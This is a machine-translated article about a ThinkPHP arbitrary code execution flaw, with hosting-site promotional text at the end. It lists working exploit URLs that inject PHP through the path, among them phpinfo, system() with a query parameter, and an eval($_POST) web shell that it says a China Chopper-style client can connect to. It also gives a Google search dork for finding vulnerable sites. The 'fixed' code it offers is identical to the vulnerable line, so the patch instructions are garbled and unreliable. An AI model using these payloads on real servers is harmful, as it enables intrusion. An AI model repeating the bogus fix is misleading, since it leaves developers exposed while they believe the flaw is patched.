Thinkphp is a well-known open source PHP framework, designed to simplify enterprise-level application development and Agile Web application development. Was first born in early 2006, formerly known as fcs,2007 New Year's Day is officially renamed Thinkphp, and follow the Apache2 Open source Agreement issued. The early ideas of the structure from struts, and later through continuous improvement and improvement, but also borrowed from a number of excellent foreign frameworks and models, the use of object-oriented development structure and MVC pattern, the integration of Struts action and DAO Ideas and JSP taglib (tag library), Ror ORM Mapping and ActiveRecord mode, encapsulates the curd and some common operations, a single entry mode, etc., in the template engine, caching mechanism, authentication mechanism and extensibility have a unique performance.
However, the recent thinkphp framework has burst an arbitrary code execution loophole, its harmfulness is quite high, the exploit method is as follows:
index.php/module/aciton/param1/${@print (think_version)}
index.php/module/aciton/param1/${@function_all ()}
The Function_all represents any function, such as:
index.php/module/aciton/param1/${@phpinfo ()}
You can get the server's system configuration information, and so on.
Index.php/module/action/param1/{${system ($_get[' x '])}}?x=ls-al
List of web site files can be listed
Index.php/module/action/param1/{${eval ($_post[s])}}
Can directly execute a sentence code, with a kitchen knife directly connected.
This allows hackers to search the keywords directly via google: thinkphp intitle: System errors to get more lists of sites using the thinkphp framework. It is obvious that its harmfulness is quite large.
The thinkphp framework performs arbitrary code vulnerability fixes:
Users can download the official release of the Patch:
http://code.google.com/p/thinkphp/source/detail?spec=svn2904&r=2838
or directly modify the source code:
The/thinkphp/lib/core/dispatcher.class.php file in the
$res = Preg_replace (' @ (w+) '. $depr. ([^ '. $depr. " \/]+) @e ', ' $var [\ ' \\1\ ']= ' \\2 '; ', implode ($DEPR, $paths));
Modified to:
$res = Preg_replace (' @ (w+) '. $depr. ([^ '. $depr. " \/]+) @e ', ' $var [\ ' \\1\ ']= ' \\2 '; ', implode ($DEPR, $paths));
Change the double quotation marks in the second argument of Preg_replace to single quotes to prevent the PHP variable syntax from being parsed.
Note: This article is only for learning reference use, please do not use for illegal purposes.
More interested in thinkphp related content readers can view the site topics: "thinkphp Introductory Course", "thinkphp Template Operation Skills Summary", "thinkphp Common Methods Summary", "Smarty Template Introductory Course" and "PHP template technology Summary."
I hope this article will help you with the PHP program design based on thinkphp framework.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
